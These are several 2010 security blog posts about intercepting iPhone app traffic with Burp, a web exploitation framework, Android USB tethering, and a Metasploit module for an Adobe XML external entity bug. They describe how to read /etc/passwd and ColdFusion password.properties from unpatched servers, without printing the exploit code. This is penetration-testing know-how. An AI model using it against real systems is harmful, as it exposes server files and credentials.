carnal0wnage [Shared Reader]

Tuesday, November 23, 2010

iPhone + Burp

This is one of those things that is super simple and I figure most folks have already done or know how to do. There may be a few people out there whose time I save with this post. Who knows. Lets get on with it.

Just as with the Droid apps, when an untrusted certificate (Burp) shows up for an app requiring SSL/TLS, the app crashes and burns. The best way (same as Droid) to fix this is to import Burp as a trusted Certificate Authority (CA).

Why would we want to do this? Apps on mobile phones are cool but some would argue the web-services the apps are communicating with can be even juicier. We'd like to intercept the communication to the web-services and play around a bit.

You'll need to export the Burp Certificate, I usually open Firefox, set the browser to run thru Burp, view the certificate, export the certificate. Much like this.........





Browse to https://twitter.com (while proxying thru Burp)


"Get Certificate"




Select PortSwigger's cert




Save Certificate with a .cer extension (.cer is what the iPhone recognizes)



Start a web server to host the PortSwiggerCA.cer 




Browse to the location of the PortSwigger.cer file




The iPhone detects .cer, asks you to install as a CA, do it :-)




WiFi configuration, click the blue arrow on the right of your network




  Configure with Burp's IP & Proxy


Hopefully that was easy enough to follow along. Now you can proxy your iPhone apps thru Burp.

~Happy Hacking

Monday, November 22, 2010

wXf Videos from AppSec DC 2010

Here are some of the videos from AppSec DC 2010 and our presentation (Seth Law, Chris Gates and I) on wXf (Web Exploitation Framework).

Background: Back in March of this year, Seth approached me with the idea of creating a framework that would allow us to put all of our discontiguous scripts together. Then we decided "our" could mean the AppSec community as a whole. Why not take everyone's one-off scripts, proof-of-concept tools and ideas and centralize them? So........we've worked off and on since March to build it.

The only frameworks available to us at the time (and even now) which were "WEB-centric" had user interfaces that weren't what we were looking for, broke after updates and/or randomly OR just didn't have the HTTP libs we needed (SOAP, JSON, Flex, etc).

So the first thing we focused on was the console interface. We figure this will probably be the interface with the most mileage. At the moment, we are still working on the console interface as well as improving the core. The framework won't be perfect from day one but we'd like to make it as easy to use as possible.

We decided Metasploit is possibly the best designed piece of open source software/framework that we've seen and it works incredibly well. People are familiar with it and it looks nice. So we decided to make wXfconsole look like msfconsole. Same *general* type of commands  and interface layout.

Release will occur in the next couple of months. We have a list of people to "beta-test" the software and want to ensure we limit the amount of bugs to a minimum upon release.

Now, for the videos.





User Agent Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.








wXf Directory Traversal Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.








wXf Web Server Stack by Seth Law from cktricky on Vimeo.

Monday, November 8, 2010

Tethering Your Droid to a Linux System

Image my happiness with i got the droid update and saw usb tethering available.

Then image my sadness-->rage that VendorX wants to charge to charge another 15 bucks to tether.

so following the instructions from here it is possible to tether via USB on linux. Evidently PDAnet works great but i dont use windows cept for powerpoint and i cant afford a mac.

so here's how to get it going if you dont want to click the link...plus i'll never remember that URL.

install proxoid on your droid

download & extract the android sdk to your linux system

turn on android usb debugging -->application-->development-->usb debugging

turn on proxoid

connect usb

cg@c0:~$ cd android-sdk-linux_86/tools/

cg@c0:~/android-sdk-linux_86/tools$ sudo ./adb start-server

cg@c0t:~/android-sdk-linux_86/tools$ ./adb forward tcp:8080 tcp:8080

set your FireFox network settings to use localhost 8080 and you can surf. You should also be able to set your whole system to go thru the droid as well if you set the system wide network proxy.

Saturday, November 6, 2010

Adobe XML Injection Metasploit Module

I just pushed out code coverage for the Adobe XML External Entity Injection vulnerability in multiple adobe products including: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and
8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data
Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

References Here:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3960
http://www.osvdb.org/62292
http://www.securityfocus.com/bid/38197
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
http://www.adobe.com/support/security/bulletins/apsb10-05.html

I recommend you read security-asessment's pdf on it, its good.

Anyway, its a cool bug.
1 -->because it affects several products although most people have probably never heard of most of them except for ColdFusion.
2 -->its enabled by default on all those products you've never heard of except for ColdFusion, with the exception of CF 8 which appears to have it turned on by default.
3 -->You have to apply patches for CF individually and there is no automated process. Since this vuln got little media attention I've seen alot of hosts that are still missing this patch and/or didn't turn off the vuln service.

On with the demo!

So against a patched host or someone that has disabled the service in ColdFusion you'll see one of two things; either 404's for the checks or 200 for /flex2gateway/ and 500 for the http or https check.



If you get a bunch of 400's then you need to set the VHOST


When it works, you'll see something like this for /etc/passwd


and like this when you asked for a file that doesn't exist or doesn't have permission to read (since CF doesn't run as root on linux, requesting /etc/shadow wont work) :-(


At this point, you're probably like "so what" well whats cool about arbitrary file read is that 1. it also works on Windows:

and 2. that whole password.properties attack is now cool again because you can just request that file too


-CG